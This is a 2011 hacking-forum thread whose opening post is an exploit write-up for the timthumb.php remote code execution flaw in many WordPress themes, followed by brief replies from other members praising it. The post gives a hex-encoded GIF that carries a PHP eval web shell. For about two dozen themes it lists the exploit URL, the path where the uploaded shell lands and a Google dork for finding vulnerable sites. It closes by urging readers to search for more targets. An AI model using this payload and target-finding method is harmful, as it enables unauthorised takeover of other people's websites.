Devilzc0de Forum Follow @devilzc0de
  • Home
  • Hacking
  • Networking
  • Programming
  • O.S
  • Server
  • Tweets
  • Search
  • Member List
  • Calendar
Current time: 05-21-2013, 08:13 PM Hello There, Guest! (Login — Register)
Devilzc0de Forum › Information Technology › Hacking › Exploit v
« Previous 1 ... 4 5 6 7 8 ... 15 Next »

Multiple WordPress Themes timthumb.php Vulnerabilites

Home General Computer Multimedia Business Lounge

Post Reply 
Tweet
Threaded Mode | Linear Mode
Multiple WordPress Themes timthumb.php Vulnerabilites
09-24-2011, 06:27 PM (This post was last modified: 04-06-2012 11:34 PM by tempe_mendoan.)
Post: #1
tempe_mendoan Offline
Banned
**
Moderators
Posts: 666
Joined: Mar 2010
Reputation: 16
Multiple WordPress Themes timthumb.php Vulnerabilites
[quote]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

# Exploit Title: Multiple WordPress Themes timthumb.php Vulnerabilites
# Date: 23 September 2011
# Author: tempe_mendoan
# Home : Mbuh Ra Ngerti Golek Dewek
# Version: 1.32 (Only version 1.19 and 1.32 were tested.)
# Tested on: Windows XP Bajakan

Reference:

WordPress TimThumb Plugin - Remote Code Execution
Multiple Wordpress Plugin timthumb.php Vulnerabilites

Credits:
- Mark Maunder (Original Researcher)
- MaXe (Indepedendent Proof of Concept Writer)
- Ben Schmidt

Stored file on the Target: (This can change from host to host.)
1.19: http://www.target.tld/wp-content/themes/...$src);
1.32: http://www.target.tld/wp-content/themes/...$src);
md5($src); means the input value of the 'src' GET-request - Hashed in MD5 format.

Proof of Concept File:
\x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00
\xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00
\x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02
\x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65
\x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D
\x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00

(Transparent GIF + <?php @eval($_GET['cmd']) ?>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_____________________________________________________________________________

POC :
http://website/wp-content/themes/SimplePress/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/SimplePress/cache/md5($src);

[~] Google Dork : /wp-content/themes/SimplePress/
[~] Software Link : http://www.elegantthemes.com/gallery/simplepress/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/sportpress/scripts/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/sportpress/scripts/cache/md5($src);

[~] Google Dork : /wp-content/themes/sportpress/
[~] Software Link : http://www.wpzoom.com/themes/sportpress/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/skeptical/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/skeptical/cache/external_md5($src);

[~] Google Dork : /wp-content/themes/skeptical/
[~] Software Link : http://www.wpmods.com/skeptical-wordpress-theme/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/TheCorporation/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/TheCorporation/cache/md5($src);

[~] Google Dork : /wp-content/themes/TheCorporation/
[~] Software Link : http://www.premiumwp.com/the-corporation...ess-theme/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/themorningafter/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/themorningafter/cache/md5($src);

[~] Google Dork : /wp-content/themes/themorningafter/
[~] Software Link : http://www.bestwpthemes.com/the-morning-after/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/magazinum/scripts/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/magazinum/scripts/cache/md5($src);

[~] Google Dork : /wp-content/themes/magazinum/
[~] Software Link : http://www.wpzoom.com/themes/magazinum/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/thestation/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/thestation/cache/external_md5($src);

[~] Google Dork : /wp-content/themes/thestation/
[~] Software Link : http://www.premiumwp.com/the-station-ver...ess-theme/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/newswp/scripts/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/newswp/scripts/cache/external_md5($src);

[~] Google Dork : /wp-content/themes/newswp/
[~] Software Link : http://monstrtemplaite.tk/news-wp-themes-download.html
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/epsilon/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/epsilon/cache/external_md5($src);

[~] Google Dork : /wp-content/themes/epsilon/
[~] Software Link : http://topwpthemes.com/epsilon/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/viroshop/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/viroshop/cache/external_md5($src);
/wp-content/themes/viroshop/temp/md5($src);

[~] Google Dork : /wp-content/themes/viroshop/
[~] Software Link : http://www.prowordpress.net/premium-word...ess-theme/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/eVid/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/eVid/temp/md5($src);

[~] Google Dork : /wp-content/themes/eVid/
[~] Software Link : http://wpthemesdownload.net/download-evi...antthemes/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/versatile/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/versatile/cache/md5($src);

[~] Google Dork : /wp-content/themes/versatile/
[~] Software Link : http://themeforest.net/item/versatile-pr...eme/150471
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/cadabrapress/scripts/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/cadabrapress/scripts/cache/md5($src);

[~] Google Dork : /wp-content/themes/cadabrapress/
[~] Software Link : http://www.wpzoom.com/themes/cadabrapress/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/rt_infuse_wp/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/rt_infuse_wp/cache/external_md5($src);

[~] Google Dork : /wp-content/themes/rt_infuse_wp/
[~] Software Link : http://www.rockettheme.com/wordpress-upd...e-released
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/Memoir/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/Memoir/cache/md5($src);
/wp-content/themes/Memoir/cache/external_md5($src);

[~] Google Dork : /wp-content/themes/Memoir/
[~] Software Link : http://wpthemesdownload.net/memoir-theme...antthemes/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/kingsize/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/kingsize/cache/external_md5($src);

[~] Google Dork : /wp-content/themes/kingsize/
[~] Software Link : http://www.newwordpresstheme.net/2011/08...oad-2.html
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/SimplePress/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/SimplePress/cache/md5($src);

[~] Google Dork : /wp-content/themes/SimplePress/
[~] Software Link : http://www.elegantthemes.com/gallery/simplepress/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/elegantestate/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/elegantestate/cache/md5($src);

[~] Google Dork : /wp-content/themes/elegantestate/
[~] Software Link : http://wpthemesdownload.net/download-ele...ress-free/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/Glow/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/Glow/temp/md5($src);

[~] Google Dork : /wp-content/themes/Glow/
[~] Software Link : http://www.elegantthemes.com/gallery/glow/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/OptimizePress/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/OptimizePress/cache/md5($src);

[~] Google Dork : /wp-content/themes/OptimizePress/
[~] Software Link : http://www.famousbloggers.net/optimizepr...-page.html
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/Modest/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/Modest/cache/external_md5($src);

[~] Google Dork : /wp-content/themes/Modest/
[~] Software Link : http://www.elegantthemes.com/gallery/modest/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/LightBright/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/LightBright/temp/md5($src);

[~] Google Dork : /wp-content/themes/LightBright/
[~] Software Link : http://www.elegantthemes.com/gallery/lightbright/
_____________________________________________________________________________
_____________________________________________________________________________

POC :
http://website/wp-content/themes/Glider/timthumb.php?src=Injection_Url

Finish Upload Shell in : /wp-content/themes/Glider/temp/md5($src);

[~] Google Dork : /wp-content/themes/Glider/
[~] Software Link : http://www.elegantthemes.com/gallery/glider/
_____________________________________________________________________________
_____________________________________________________________________________

Note :

And All bug Themes timthumb.php in Google .. See You !!
_____________________________________________________________________________


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Thanks To :

[-] MaXe
[-] millo , arif , skygers , rasdam , aury ( onetcr3w )
[-] kangkung , bjork , Cavalera , van_java , Satria , Daviz , ArRay And All Byroe Net IRc Team
[-] tukulesto , yurakh4 , xr0b0t , falcon , chaer.newbie , wenkhairu , tabun , tridi , mboys , jundab , nakula
[-] mas boy , arianom , mboys , kodok maho , hakz , vyc0d , ketek bang udin And all my Friends
[-] My Best Friend : r3m1ck, El-Farhatz, kaMtiEz, Adeyonatan

Special To :

[-] kang zaki_22 suwun yo kang di ajari bingung wae suramz =))

[-] my love dyla semoga cepat sembuh sayangku :*



Tutor Visit :
Thread + VIdeo
Visit this user's website Find all posts by this user
Quote this message in a reply
09-24-2011, 06:41 PM (This post was last modified: 09-24-2011 06:42 PM by nuxbie_cyber.)
Post: #2
nuxbie_cyber Offline
./Devilz Commander
Posts: 267
Joined: Jun 2011
Reputation: 23
RE: Multiple WordPress Themes timthumb.php Vulnerabilites
Cek your email... wawa

God Job... smangat

Your Exploits:
http://www.thecybernuxbie.com/exploits-r...rabilites/ santai

http://www.thecybernuxbie.com/private_ar...e_mendoan/
Visit this user's website Find all posts by this user
Quote this message in a reply
09-24-2011, 06:50 PM
Post: #3
Wayc0de Offline
-= Sifu Makan Sonice =-
**
Moderators
Posts: 2,980
Joined: Nov 2010
Reputation: 61
RE: Multiple WordPress Themes timthumb.php Vulnerabilites
pdhl ane baru tadi liat nie disumbernya (ato salah liat ea) seneng

skrg dh disini j hmm

thanks om tempe
Visit this user's website Find all posts by this user
Quote this message in a reply
09-24-2011, 07:06 PM
Post: #4
tian hv Offline
./Sampah Masyarakat
Posts: 486
Joined: Mar 2010
Reputation: 18
RE: Multiple WordPress Themes timthumb.php Vulnerabilites
mantap om
TKP dolo ya

hmm
Visit this user's website Find all posts by this user
Quote this message in a reply
09-24-2011, 07:26 PM
Post: #5
adoet_t Offline
Devilz e-Magazine Team (DeMT)
*****
DeMT Team
Posts: 128
Joined: Jul 2010
Reputation: 22
RE: Multiple WordPress Themes timthumb.php Vulnerabilites
ajib,, piss premium theme banyak kena,,
Visit this user's website Find all posts by this user
Quote this message in a reply
09-24-2011, 10:33 PM
Post: #6
anko_kum4ru Offline
./b0k3p3r_4r34
****
Global Moderators
Posts: 1,451
Joined: Dec 2010
Reputation: 10
RE: Multiple WordPress Themes timthumb.php Vulnerabilites
omz tempe emang keyeennn... smangat smangat
Visit this user's website Find all posts by this user
Quote this message in a reply
09-25-2011, 05:50 AM
Post: #7
ohara_inamiji Offline
^^"
**
Moderators
Posts: 761
Joined: Jun 2011
Reputation: 46
RE: Multiple WordPress Themes timthumb.php Vulnerabilites
cool kk
belajarbelajar
Visit this user's website Find all posts by this user
Quote this message in a reply
09-25-2011, 06:25 AM
Post: #8
tridi Offline
Pembaca Setia
Posts: 832
Joined: Jul 2010
Reputation: 33
RE: Multiple WordPress Themes timthumb.php Vulnerabilites
sedikit bingung aku dg ginian..
belajar
Visit this user's website Find all posts by this user
Quote this message in a reply
09-25-2011, 08:53 AM
Post: #9
Initial-d Offline
./Devilz Officer
Posts: 164
Joined: Jun 2011
Reputation: 1
RE: Multiple WordPress Themes timthumb.php Vulnerabilites
Gila!
Banyak amir themes yg kena
THX infox
Find all posts by this user
Quote this message in a reply
« Next Oldest | Next Newest »
Post Reply 


Topic Tools
Topic Link :
BBCode :
HTML Code :
View a Printable Version Send Thread to a Friend Subscribe to this thread
Submit Google Submit Face book Submit to Digg Submit to Reddit Submit to Furl Submit to Del.icio.us Submit to Jeqq

Possibly Related Threads...
Thread: Author Replies: Views: Last Post
  [Tutor] WordPress Exploit (easy-comment-uploads/upload-form.php) XPByte 16 1,028 05-19-2013 05:40 PM
Last Post: oe_c0x
  WordPress LeagueManager Plugin v3.8 eskiel go.id 12 184 04-01-2013 02:00 PM
Last Post: beg3nk newb1e
Thumbs Up [Tutor] POC + Exploit Wordpress ~ Video Blogging Arbitrary File Upload Regel 11 671 02-02-2013 12:19 AM
Last Post: copaker21
  [Tutor] Hotel Booking Portal v0.1 Multiple Vulnerabilities Reborn Of Code 9 341 10-30-2012 12:42 PM
Last Post: xnuxer_001
  [Tutor] Sistem Biwes Multiple Vulnerability eidelweiss 10 259 09-01-2012 10:09 AM
Last Post: Super Moderator
  Wordpress Plugins Pecemaker chastiter 4 198 07-29-2012 07:58 AM
Last Post: blackhariki
Bug CMS DMS-Easy - Multiple Vulnerability nuxbie_cyber 6 165 06-23-2012 09:15 PM
Last Post: chiboga
Bug - Joomla VS Wordpress Exploits Report: nuxbie_cyber 11 358 02-27-2012 12:46 AM
Last Post: Death Note
  Lokomedia CMS 1.4.5 Multiple Vulnerable wenkhairu 11 556 11-04-2011 01:19 PM
Last Post: nubi3
  [web apps]multiple ebizproduction sql injection vulberability kiddies 7 225 09-26-2011 11:04 AM
Last Post: begoamat

Users Browsing
1 Guest(s)

  • Contact Us
  • devilzc0de
  • Return to Top
  • Mobile Version
  • RSS Syndication
  • Help
Current time: 05-21-2013, 08:13 PM Powered By MyBB, © 2002-2013 MyBB Group. Theme created by Justin S. | Mixed By Chaer.Newbie | Fixed By Aditya

USING THIS SITE INDICATES THAT YOU HAVE READ AND ACCEPT OUR TERMS. IF YOU DO NOT ACCEPT THESE TERMS, YOU ARE NOT AUTHORIZED TO USE THIS SITE